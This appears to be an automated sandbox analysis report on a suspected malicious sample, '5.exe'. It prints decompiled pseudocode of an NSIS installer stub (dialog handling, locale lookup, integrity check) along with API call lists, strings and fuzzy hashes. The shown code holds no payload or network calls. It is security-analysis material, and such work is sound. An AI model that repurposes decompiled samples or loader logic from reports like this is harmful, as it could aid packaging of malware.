                                                                                              						EndDialog(_t125,  *0x4293a0);
                                                                                              						goto L58;
                                                                                              					} else {
                                                                                              						__eflags = _t35 - 1;
                                                                                              						if(_t35 != 1) {
                                                                                              							L33:
                                                                                              							__eflags =  *_t130 - _t133;
                                                                                              							if( *_t130 == _t133) {
                                                                                              								goto L61;
                                                                                              							}
                                                                                              							goto L34;
                                                                                              						}
                                                                                              						_push(0);
                                                                                              						_t86 = E00401389( *((intOrPtr*)(_t130 + 0x10)));
                                                                                              						__eflags = _t86;
                                                                                              						if(_t86 == 0) {
                                                                                              							goto L33;
                                                                                              						}
                                                                                              						SendMessageA( *0x42e338, 0x40f, 0, 1);
                                                                                              						__eflags =  *0x42e32c - _t133; // 0x0
                                                                                              						return 0 | __eflags == 0x00000000;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t125 = _a4;
                                                                                              					_t133 = 0;
                                                                                              					if(_t115 == 0x47) {
                                                                                              						SetWindowPos( *0x429fb0, _t125, 0, 0, 0, 0, 0x13);
                                                                                              					}
                                                                                              					if(_t115 == 5) {
                                                                                              						asm("sbb eax, eax");
                                                                                              						ShowWindow( *0x429fb0,  ~(_a12 - 1) & _t115);
                                                                                              					}
                                                                                              					if(_t115 != 0x40d) {
                                                                                              						__eflags = _t115 - 0x11;
                                                                                              						if(_t115 != 0x11) {
                                                                                              							__eflags = _t115 - 0x111;
                                                                                              							if(_t115 != 0x111) {
                                                                                              								L26:
                                                                                              								return E00403D44(_t115, _a12, _a16);
                                                                                              							}
                                                                                              							_t132 = _a12 & 0x0000ffff;
                                                                                              							_t126 = GetDlgItem(_t125, _t132);
                                                                                              							__eflags = _t126 - _t133;
                                                                                              							if(_t126 == _t133) {
                                                                                              								L13:
                                                                                              								__eflags = _t132 - 1;
                                                                                              								if(_t132 != 1) {
                                                                                              									__eflags = _t132 - 3;
                                                                                              									if(_t132 != 3) {
                                                                                              										_t127 = 2;
                                                                                              										__eflags = _t132 - _t127;
                                                                                              										if(_t132 != _t127) {
                                                                                              											L25:
                                                                                              											SendMessageA( *0x42e338, 0x111, _a12, _a16);
                                                                                              											goto L26;
                                                                                              										}
                                                                                              										__eflags =  *0x42ebec - _t133; // 0x0
                                                                                              										if(__eflags == 0) {
                                                                                              											_t99 = E0040140B(3);
                                                                                              											__eflags = _t99;
                                                                                              											if(_t99 != 0) {
                                                                                              												goto L26;
                                                                                              											}
                                                                                              											 *0x4293a0 = 1;
                                                                                              											L21:
                                                                                              											_push(0x78);
                                                                                              											L22:
                                                                                              											E00403CB6();
                                                                                              											goto L26;
                                                                                              										}
                                                                                              										E0040140B(_t127);
                                                                                              										 *0x4293a0 = _t127;
                                                                                              										goto L21;
                                                                                              									}
                                                                                              									__eflags =  *0x40919c - _t133; // 0xffffffff
                                                                                              									if(__eflags <= 0) {
                                                                                              										goto L25;
                                                                                              									}
                                                                                              									_push(0xffffffff);
                                                                                              									goto L22;
                                                                                              								}
                                                                                              								_push(_t132);
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							SendMessageA(_t126, 0xf3, _t133, _t133);
                                                                                              							_t103 = IsWindowEnabled(_t126);
                                                                                              							__eflags = _t103;
                                                                                              							if(_t103 == 0) {
                                                                                              								goto L61;
                                                                                              							}
                                                                                              							goto L13;
                                                                                              						}
                                                                                              						SetWindowLongA(_t125, _t133, _t133);
                                                                                              						return 1;
                                                                                              					} else {
                                                                                              						DestroyWindow( *0x42e338);
                                                                                              						 *0x42e338 = _a12;
                                                                                              						L58:
                                                                                              						if( *0x42afd8 == _t133) {
                                                                                              							_t142 =  *0x42e338 - _t133; // 0x0
                                                                                              							if(_t142 != 0) {
                                                                                              								ShowWindow(_t125, 0xa);
                                                                                              								 *0x42afd8 = 1;
                                                                                              							}
                                                                                              						}
                                                                                              						L61:
                                                                                              						return 0;
                                                                                              					}
                                                                                              				}
                                                                                              			}
































                                                                                              0x00403bae
                                                                                              0x00403bb4
                                                                                              0x00403bba
                                                                                              0x00403bbc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403be2
                                                                                              0x00403be8
                                                                                              0x00403bea
                                                                                              0x00403bef
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403bf5
                                                                                              0x00403bf8
                                                                                              0x00403bfb
                                                                                              0x00403c12
                                                                                              0x00403c1e
                                                                                              0x00403c37
                                                                                              0x00403c3d
                                                                                              0x00403c41
                                                                                              0x00403c46
                                                                                              0x00403c4c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403c56
                                                                                              0x00403c61
                                                                                              0x00000000
                                                                                              0x00403c61
                                                                                              0x00403b8b
                                                                                              0x00403b91
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403b97
                                                                                              0x00403b9d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403ba3
                                                                                              0x00403b77
                                                                                              0x00403c6e
                                                                                              0x00403c7a
                                                                                              0x00403c81
                                                                                              0x00000000
                                                                                              0x004039d2
                                                                                              0x004039d2
                                                                                              0x004039d5
                                                                                              0x00403a08
                                                                                              0x00403a08
                                                                                              0x00403a0a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403a0a
                                                                                              0x004039d7
                                                                                              0x004039db
                                                                                              0x004039e0
                                                                                              0x004039e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004039f2
                                                                                              0x004039fa
                                                                                              0x00000000
                                                                                              0x00403a00
                                                                                              0x0040382e
                                                                                              0x0040382e
                                                                                              0x00403832
                                                                                              0x00403837
                                                                                              0x00403846
                                                                                              0x00403846
                                                                                              0x0040384f
                                                                                              0x00403858
                                                                                              0x00403863
                                                                                              0x00403863
                                                                                              0x0040386f
                                                                                              0x0040388b
                                                                                              0x0040388e
                                                                                              0x004038a1
                                                                                              0x004038a7
                                                                                              0x0040394a
                                                                                              0x00000000
                                                                                              0x00403953
                                                                                              0x004038ad
                                                                                              0x004038ba
                                                                                              0x004038bc
                                                                                              0x004038be
                                                                                              0x004038dd
                                                                                              0x004038dd
                                                                                              0x004038e0
                                                                                              0x004038e5
                                                                                              0x004038e8
                                                                                              0x004038f8
                                                                                              0x004038f9
                                                                                              0x004038fb
                                                                                              0x00403931
                                                                                              0x00403944
                                                                                              0x00000000
                                                                                              0x00403944
                                                                                              0x004038fd
                                                                                              0x00403903
                                                                                              0x0040391c
                                                                                              0x00403921
                                                                                              0x00403923
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403925
                                                                                              0x00403911
                                                                                              0x00403911
                                                                                              0x00403913
                                                                                              0x00403913
                                                                                              0x00000000
                                                                                              0x00403913
                                                                                              0x00403906
                                                                                              0x0040390b
                                                                                              0x00000000
                                                                                              0x0040390b
                                                                                              0x004038ea
                                                                                              0x004038f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004038f2
                                                                                              0x00000000
                                                                                              0x004038f2
                                                                                              0x004038e2
                                                                                              0x00000000
                                                                                              0x004038e2
                                                                                              0x004038c8
                                                                                              0x004038cf
                                                                                              0x004038d5
                                                                                              0x004038d7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004038d7
                                                                                              0x00403893
                                                                                              0x00000000
                                                                                              0x00403871
                                                                                              0x00403877
                                                                                              0x00403881
                                                                                              0x00403c87
                                                                                              0x00403c8d
                                                                                              0x00403c8f
                                                                                              0x00403c95
                                                                                              0x00403c9a
                                                                                              0x00403ca0
                                                                                              0x00403ca0
                                                                                              0x00403c95
                                                                                              0x00403caa
                                                                                              0x00000000
                                                                                              0x00403caa
                                                                                              0x0040386f

                                                                                              APIs
                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403846
                                                                                              • ShowWindow.USER32(?), ref: 00403863
                                                                                              • DestroyWindow.USER32 ref: 00403877
                                                                                              • SetWindowLongA.USER32 ref: 00403893
                                                                                              • GetDlgItem.USER32 ref: 004038B4
                                                                                              • SendMessageA.USER32 ref: 004038C8
                                                                                              • IsWindowEnabled.USER32(00000000), ref: 004038CF
                                                                                              • GetDlgItem.USER32 ref: 0040397D
                                                                                              • GetDlgItem.USER32 ref: 00403987
                                                                                              • KiUserCallbackDispatcher.NTDLL(?,000000F2,?,0000001C,000000FF), ref: 004039A1
                                                                                              • SendMessageA.USER32 ref: 004039F2
                                                                                              • GetDlgItem.USER32 ref: 00403A98
                                                                                              • ShowWindow.USER32(00000000,?), ref: 00403AB9
                                                                                              • EnableWindow.USER32(?,?), ref: 00403ACB
                                                                                              • EnableWindow.USER32(?,?), ref: 00403AE6
                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403AFC
                                                                                              • EnableMenuItem.USER32 ref: 00403B03
                                                                                              • SendMessageA.USER32 ref: 00403B1B
                                                                                              • SendMessageA.USER32 ref: 00403B2E
                                                                                              • lstrlenA.KERNEL32(00429FD8,?,00429FD8,qjsvdse Setup), ref: 00403B57
                                                                                              • SetWindowTextA.USER32(?,00429FD8), ref: 00403B66
                                                                                              • ShowWindow.USER32(?,0000000A), ref: 00403C9A
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: Window$Item$MessageSend$EnableShow$Menu$CallbackDestroyDispatcherEnabledLongSystemTextUserlstrlen
                                                                                              • String ID: qjsvdse Setup
                                                                                              • API String ID: 4050669955-3915909185
                                                                                              • Opcode ID: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                              • Instruction ID: 5403acdcc1aa6bbc142bc1e7719ab292303190a86846970e4bd25be8090c7a94
                                                                                              • Opcode Fuzzy Hash: 43eaee0801e6aaf426ce723482984d0a7cd0caf67a9dfded40985b489c984417
                                                                                              • Instruction Fuzzy Hash: DCC1B471A08204ABEB21AF62ED85E2B7E6CFB45706F40043EF541B51E1C779A942DF1E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 96%
                                                                                              			E00403489() {
                                                                                              				intOrPtr _v4;
                                                                                              				intOrPtr _v8;
                                                                                              				int _v12;
                                                                                              				int _v16;
                                                                                              				char _v20;
                                                                                              				void* __ebx;
                                                                                              				void* __edi;
                                                                                              				void* __esi;
                                                                                              				intOrPtr* _t20;
                                                                                              				signed int _t24;
                                                                                              				void* _t28;
                                                                                              				void* _t30;
                                                                                              				int _t31;
                                                                                              				void* _t34;
                                                                                              				struct HINSTANCE__* _t37;
                                                                                              				int _t38;
                                                                                              				intOrPtr _t39;
                                                                                              				int _t42;
                                                                                              				intOrPtr _t59;
                                                                                              				char _t61;
                                                                                              				CHAR* _t63;
                                                                                              				signed char _t67;
                                                                                              				struct HINSTANCE__* _t75;
                                                                                              				CHAR* _t78;
                                                                                              				intOrPtr _t80;
                                                                                              				CHAR* _t85;
                                                                                              
                                                                                              				_t80 =  *0x42eb70; // 0x654160
                                                                                              				_t20 = E00405C49(6);
                                                                                              				_t87 = _t20;
                                                                                              				if(_t20 == 0) {
                                                                                              					_t78 = 0x429fd8;
                                                                                              					"1033" = 0x7830;
                                                                                              					E00405812(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x429fd8, 0);
                                                                                              					__eflags =  *0x429fd8;
                                                                                              					if(__eflags == 0) {
                                                                                              						E00405812(0x80000003, ".DEFAULT\\Control Panel\\International",  &M00407302, 0x429fd8, 0);
                                                                                              					}
                                                                                              					lstrcatA("1033", _t78);
                                                                                              				} else {
                                                                                              					E00405889("1033",  *_t20() & 0x0000ffff);
                                                                                              				}
                                                                                              				E0040373D(_t75, _t87);
                                                                                              				_t24 =  *0x42eb78; // 0x80
                                                                                              				_t84 = "C:\\Users\\alfons\\AppData\\Local\\Temp";
                                                                                              				 *0x42ebe0 = _t24 & 0x00000020;
                                                                                              				if(E004054FF(_t87, "C:\\Users\\alfons\\AppData\\Local\\Temp") != 0) {
                                                                                              					L16:
                                                                                              					if(E004054FF(_t95, _t84) == 0) {
                                                                                              						E0040594D(0, _t78, _t80, _t84,  *((intOrPtr*)(_t80 + 0x118)));
                                                                                              					}
                                                                                              					_t28 = LoadImageA( *0x42eb60, 0x67, 1, 0, 0, 0x8040); // executed
                                                                                              					 *0x42e348 = _t28;
                                                                                              					if( *((intOrPtr*)(_t80 + 0x50)) == 0xffffffff) {
                                                                                              						L21:
                                                                                              						if(E0040140B(0) == 0) {
                                                                                              							_t30 = E0040373D(_t75, __eflags);
                                                                                              							__eflags =  *0x42ec00; // 0x0
                                                                                              							if(__eflags != 0) {
                                                                                              								_t31 = E00404D9B(_t30, 0);
                                                                                              								__eflags = _t31;
                                                                                              								if(_t31 == 0) {
                                                                                              									E0040140B(1);
                                                                                              									goto L33;
                                                                                              								}
                                                                                              								__eflags =  *0x42e32c; // 0x0
                                                                                              								if(__eflags == 0) {
                                                                                              									E0040140B(2);
                                                                                              								}
                                                                                              								goto L22;
                                                                                              							}
                                                                                              							ShowWindow( *0x429fb0, 5); // executed
                                                                                              							_t37 = LoadLibraryA("RichEd20"); // executed
                                                                                              							__eflags = _t37;
                                                                                              							if(_t37 == 0) {
                                                                                              								LoadLibraryA("RichEd32");
                                                                                              							}
                                                                                              							_t85 = "RichEdit20A";
                                                                                              							_t38 = GetClassInfoA(0, _t85, 0x42e300);
                                                                                              							__eflags = _t38;
                                                                                              							if(_t38 == 0) {
                                                                                              								GetClassInfoA(0, "RichEdit", 0x42e300);
                                                                                              								 *0x42e324 = _t85;
                                                                                              								RegisterClassA(0x42e300);
                                                                                              							}
                                                                                              							_t39 =  *0x42e340; // 0x0
                                                                                              							_t42 = DialogBoxParamA( *0x42eb60, _t39 + 0x00000069 & 0x0000ffff, 0, E0040380A, 0); // executed
                                                                                              							E0040140B(5);
                                                                                              							return _t42;
                                                                                              						}
                                                                                              						L22:
                                                                                              						_t34 = 2;
                                                                                              						return _t34;
                                                                                              					} else {
                                                                                              						_t75 =  *0x42eb60; // 0x400000
                                                                                              						 *0x42e314 = _t28;
                                                                                              						_v20 = 0x624e5f;
                                                                                              						 *0x42e304 = E00401000;
                                                                                              						 *0x42e310 = _t75;
                                                                                              						 *0x42e324 =  &_v20;
                                                                                              						if(RegisterClassA(0x42e300) == 0) {
                                                                                              							L33:
                                                                                              							__eflags = 0;
                                                                                              							return 0;
                                                                                              						}
                                                                                              						_t12 =  &_v16; // 0x624e5f
                                                                                              						SystemParametersInfoA(0x30, 0, _t12, 0);
                                                                                              						 *0x429fb0 = CreateWindowExA(0x80,  &_v20, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x42eb60, 0);
                                                                                              						goto L21;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t75 =  *(_t80 + 0x48);
                                                                                              					if(_t75 == 0) {
                                                                                              						goto L16;
                                                                                              					}
                                                                                              					_t59 =  *0x42eb98; // 0x6590c0
                                                                                              					_t78 = 0x42db00;
                                                                                              					E00405812( *((intOrPtr*)(_t80 + 0x44)), _t75,  *((intOrPtr*)(_t80 + 0x4c)) + _t59, 0x42db00, 0);
                                                                                              					_t61 =  *0x42db00; // 0x69
                                                                                              					if(_t61 == 0) {
                                                                                              						goto L16;
                                                                                              					}
                                                                                              					if(_t61 == 0x22) {
                                                                                              						_t78 = 0x42db01;
                                                                                              						 *((char*)(E00405449(0x42db01, 0x22))) = 0;
                                                                                              					}
                                                                                              					_t63 = lstrlenA(_t78) + _t78 - 4;
                                                                                              					if(_t63 <= _t78 || lstrcmpiA(_t63, ?str?) != 0) {
                                                                                              						L15:
                                                                                              						E0040592B(_t84, E0040541E(_t78));
                                                                                              						goto L16;
                                                                                              					} else {
                                                                                              						_t67 = GetFileAttributesA(_t78);
                                                                                              						if(_t67 == 0xffffffff) {
                                                                                              							L14:
                                                                                              							E00405465(_t78);
                                                                                              							goto L15;
                                                                                              						}
                                                                                              						_t95 = _t67 & 0x00000010;
                                                                                              						if((_t67 & 0x00000010) != 0) {
                                                                                              							goto L15;
                                                                                              						}
                                                                                              						goto L14;
                                                                                              					}
                                                                                              				}
                                                                                              			}

                                                                                              APIs
                                                                                                • Part of subcall function 00405C49: GetModuleHandleA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C5B
                                                                                                • Part of subcall function 00405C49: LoadLibraryA.KERNEL32(?,?,00000000,00403126,00000008), ref: 00405C66
                                                                                                • Part of subcall function 00405C49: GetProcAddress.KERNEL32(00000000,?), ref: 00405C77
                                                                                              • lstrcatA.KERNEL32(1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\5.exe" ,00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004034FA
                                                                                              • lstrlenA.KERNEL32(ivvzb,?,?,?,ivvzb,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000,00000006,"C:\Users\user\Desktop\5.exe" ), ref: 00403565
                                                                                              • lstrcmpiA.KERNEL32(?,.exe,ivvzb,?,?,?,ivvzb,00000000,C:\Users\user\AppData\Local\Temp,1033,00429FD8,80000001,Control Panel\Desktop\ResourceLocale,00000000,00429FD8,00000000), ref: 00403578
                                                                                              • GetFileAttributesA.KERNEL32(ivvzb), ref: 00403583
                                                                                              • LoadImageA.USER32 ref: 004035CC
                                                                                                • Part of subcall function 00405889: wsprintfA.USER32 ref: 00405896
                                                                                              • RegisterClassA.USER32 ref: 00403613
                                                                                              • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 0040362B
                                                                                              • CreateWindowExA.USER32 ref: 00403664
                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403696
                                                                                              • LoadLibraryA.KERNEL32(RichEd20), ref: 004036A7
                                                                                              • LoadLibraryA.KERNEL32(RichEd32), ref: 004036B2
                                                                                              • GetClassInfoA.USER32 ref: 004036C2
                                                                                              • GetClassInfoA.USER32 ref: 004036CF
                                                                                              • RegisterClassA.USER32 ref: 004036D8
                                                                                              • DialogBoxParamA.USER32 ref: 004036F7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                              • String ID: "C:\Users\user\Desktop\5.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$`Ae$ivvzb
                                                                                              • API String ID: 914957316-3978164049
                                                                                              • Opcode ID: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                              • Instruction ID: 2e12796d13047950d683a8fbe5a4005f9ba98cb8c12c36bead37cfa09a1e5f4f
                                                                                              • Opcode Fuzzy Hash: ddebcaf873b3f80ffc25d6dfb232b9e28d9230a7995e8b1577ae424d02e99e0f
                                                                                              • Instruction Fuzzy Hash: 4C61C5B0644244BED620AF629D45E273AACEB4575AF44443FF941B22E2D73DAD018A3E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 80%
                                                                                              			E00402C0B(void* __eflags, signed int _a4) {
                                                                                              				DWORD* _v8;
                                                                                              				DWORD* _v12;
                                                                                              				void* _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				long _v24;
                                                                                              				intOrPtr _v28;
                                                                                              				intOrPtr _v32;
                                                                                              				intOrPtr _v36;
                                                                                              				intOrPtr _v40;
                                                                                              				signed int _v44;
                                                                                              				long _t43;
                                                                                              				signed int _t50;
                                                                                              				void* _t53;
                                                                                              				signed int _t54;
                                                                                              				void* _t57;
                                                                                              				intOrPtr* _t59;
                                                                                              				long _t60;
                                                                                              				signed int _t65;
                                                                                              				signed int _t67;
                                                                                              				signed int _t70;
                                                                                              				signed int _t71;
                                                                                              				signed int _t77;
                                                                                              				intOrPtr _t80;
                                                                                              				long _t82;
                                                                                              				signed int _t85;
                                                                                              				signed int _t87;
                                                                                              				void* _t89;
                                                                                              				signed int _t90;
                                                                                              				signed int _t93;
                                                                                              				void* _t94;
                                                                                              
                                                                                              				_t82 = 0;
                                                                                              				_v12 = 0;
                                                                                              				_v8 = 0;
                                                                                              				_t43 = GetTickCount();
                                                                                              				_t91 = "C:\\Users\\alfons\\Desktop\\5.exe";
                                                                                              				 *0x42eb6c = _t43 + 0x3e8;
                                                                                              				GetModuleFileNameA(0, "C:\\Users\\alfons\\Desktop\\5.exe", 0x400);
                                                                                              				_t89 = E00405602(_t91, 0x80000000, 3);
                                                                                              				_v16 = _t89;
                                                                                              				 *0x409010 = _t89;
                                                                                              				if(_t89 == 0xffffffff) {
                                                                                              					return "Error launching installer";
                                                                                              				}
                                                                                              				_t92 = "C:\\Users\\alfons\\Desktop";
                                                                                              				E0040592B("C:\\Users\\alfons\\Desktop", _t91);
                                                                                              				E0040592B(0x436000, E00405465(_t92));
                                                                                              				_t50 = GetFileSize(_t89, 0);
                                                                                              				__eflags = _t50;
                                                                                              				 *0x428b88 = _t50;
                                                                                              				_t93 = _t50;
                                                                                              				if(_t50 <= 0) {
                                                                                              					L24:
                                                                                              					E00402BB0(1);
                                                                                              					__eflags =  *0x42eb74 - _t82; // 0x34000
                                                                                              					if(__eflags == 0) {
                                                                                              						goto L29;
                                                                                              					}
                                                                                              					__eflags = _v8 - _t82;
                                                                                              					if(_v8 == _t82) {
                                                                                              						L28:
                                                                                              						_t53 = GlobalAlloc(0x40, _v24); // executed
                                                                                              						_t94 = _t53;
                                                                                              						_t54 =  *0x42eb74; // 0x34000
                                                                                              						E00403098(_t54 + 0x1c);
                                                                                              						_push(_v24);
                                                                                              						_push(_t94);
                                                                                              						_push(_t82);
                                                                                              						_push(0xffffffff);
                                                                                              						_t57 = E00402E44();
                                                                                              						__eflags = _t57 - _v24;
                                                                                              						if(_t57 == _v24) {
                                                                                              							__eflags = _v44 & 0x00000001;
                                                                                              							 *0x42eb70 = _t94;
                                                                                              							 *0x42eb78 =  *_t94;
                                                                                              							if((_v44 & 0x00000001) != 0) {
                                                                                              								 *0x42eb7c =  *0x42eb7c + 1;
                                                                                              								__eflags =  *0x42eb7c;
                                                                                              							}
                                                                                              							_t40 = _t94 + 0x44; // 0x44
                                                                                              							_t59 = _t40;
                                                                                              							_t85 = 8;
                                                                                              							do {
                                                                                              								_t59 = _t59 - 8;
                                                                                              								 *_t59 =  *_t59 + _t94;
                                                                                              								_t85 = _t85 - 1;
                                                                                              								__eflags = _t85;
                                                                                              							} while (_t85 != 0);
                                                                                              							_t60 = SetFilePointer(_v16, _t82, _t82, 1); // executed
                                                                                              							 *(_t94 + 0x3c) = _t60;
                                                                                              							E004055C3(0x42eb80, _t94 + 4, 0x40);
                                                                                              							__eflags = 0;
                                                                                              							return 0;
                                                                                              						}
                                                                                              						goto L29;
                                                                                              					}
                                                                                              					E00403098( *0x414b78);
                                                                                              					_t65 = E00403066( &_a4, 4); // executed
                                                                                              					__eflags = _t65;
                                                                                              					if(_t65 == 0) {
                                                                                              						goto L29;
                                                                                              					}
                                                                                              					__eflags = _v12 - _a4;
                                                                                              					if(_v12 != _a4) {
                                                                                              						goto L29;
                                                                                              					}
                                                                                              					goto L28;
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t67 =  *0x42eb74; // 0x34000
                                                                                              						_t90 = _t93;
                                                                                              						asm("sbb eax, eax");
                                                                                              						_t70 = ( ~_t67 & 0x00007e00) + 0x200;
                                                                                              						__eflags = _t93 - _t70;
                                                                                              						if(_t93 >= _t70) {
                                                                                              							_t90 = _t70;
                                                                                              						}
                                                                                              						_t71 = E00403066(0x420b88, _t90); // executed
                                                                                              						__eflags = _t71;
                                                                                              						if(_t71 == 0) {
                                                                                              							E00402BB0(1);
                                                                                              							L29:
                                                                                              							return "Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                              						}
                                                                                              						__eflags =  *0x42eb74;
                                                                                              						if( *0x42eb74 != 0) {
                                                                                              							__eflags = _a4 & 0x00000002;
                                                                                              							if((_a4 & 0x00000002) == 0) {
                                                                                              								E00402BB0(0);
                                                                                              							}
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						E004055C3( &_v44, 0x420b88, 0x1c);
                                                                                              						_t77 = _v44;
                                                                                              						__eflags = _t77 & 0xfffffff0;
                                                                                              						if((_t77 & 0xfffffff0) != 0) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						__eflags = _v40 - 0xdeadbeef;
                                                                                              						if(_v40 != 0xdeadbeef) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						__eflags = _v28 - 0x74736e49;
                                                                                              						if(_v28 != 0x74736e49) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						__eflags = _v32 - 0x74666f73;
                                                                                              						if(_v32 != 0x74666f73) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						__eflags = _v36 - 0x6c6c754e;
                                                                                              						if(_v36 != 0x6c6c754e) {
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						_a4 = _a4 | _t77;
                                                                                              						_t87 =  *0x414b78; // 0xd0131
                                                                                              						 *0x42ec00 =  *0x42ec00 | _a4 & 0x00000002;
                                                                                              						_t80 = _v20;
                                                                                              						__eflags = _t80 - _t93;
                                                                                              						 *0x42eb74 = _t87;
                                                                                              						if(_t80 > _t93) {
                                                                                              							goto L29;
                                                                                              						}
                                                                                              						__eflags = _a4 & 0x00000008;
                                                                                              						if((_a4 & 0x00000008) != 0) {
                                                                                              							L16:
                                                                                              							_v8 = _v8 + 1;
                                                                                              							_t24 = _t80 - 4; // 0x409154
                                                                                              							_t93 = _t24;
                                                                                              							__eflags = _t90 - _t93;
                                                                                              							if(_t90 > _t93) {
                                                                                              								_t90 = _t93;
                                                                                              							}
                                                                                              							goto L20;
                                                                                              						}
                                                                                              						__eflags = _a4 & 0x00000004;
                                                                                              						if((_a4 & 0x00000004) != 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						goto L16;
                                                                                              						L20:
                                                                                              						__eflags = _t93 -  *0x428b88; // 0xd0135
                                                                                              						if(__eflags < 0) {
                                                                                              							_v12 = E00405CB5(_v12, 0x420b88, _t90);
                                                                                              						}
                                                                                              						 *0x414b78 =  *0x414b78 + _t90;
                                                                                              						_t93 = _t93 - _t90;
                                                                                              						__eflags = _t93;
                                                                                              					} while (_t93 > 0);
                                                                                              					_t82 = 0;
                                                                                              					__eflags = 0;
                                                                                              					goto L24;
                                                                                              				}
                                                                                              			}

































                                                                                              0x00402d31
                                                                                              0x00402d35
                                                                                              0x00402d3d
                                                                                              0x00402d3d
                                                                                              0x00402d40
                                                                                              0x00402d40
                                                                                              0x00402d43
                                                                                              0x00402d45
                                                                                              0x00402d47
                                                                                              0x00402d47
                                                                                              0x00000000
                                                                                              0x00402d45
                                                                                              0x00402d37
                                                                                              0x00402d3b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00402d59
                                                                                              0x00402d59
                                                                                              0x00402d5f
                                                                                              0x00402d6b
                                                                                              0x00402d6b
                                                                                              0x00402d6e
                                                                                              0x00402d74
                                                                                              0x00402d76
                                                                                              0x00402d76
                                                                                              0x00402d7e
                                                                                              0x00402d7e
                                                                                              0x00000000
                                                                                              0x00402d7e

                                                                                              APIs
                                                                                              • GetTickCount.KERNEL32 ref: 00402C1C
                                                                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\5.exe,00000400), ref: 00402C38
                                                                                                • Part of subcall function 00405602: GetFileAttributesA.KERNEL32(00000003,00402C4B,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00405606
                                                                                                • Part of subcall function 00405602: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405628
                                                                                              • GetFileSize.KERNEL32(00000000,00000000,00436000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\5.exe,C:\Users\user\Desktop\5.exe,80000000,00000003), ref: 00402C84
                                                                                              Strings
                                                                                              Memory Dump Source
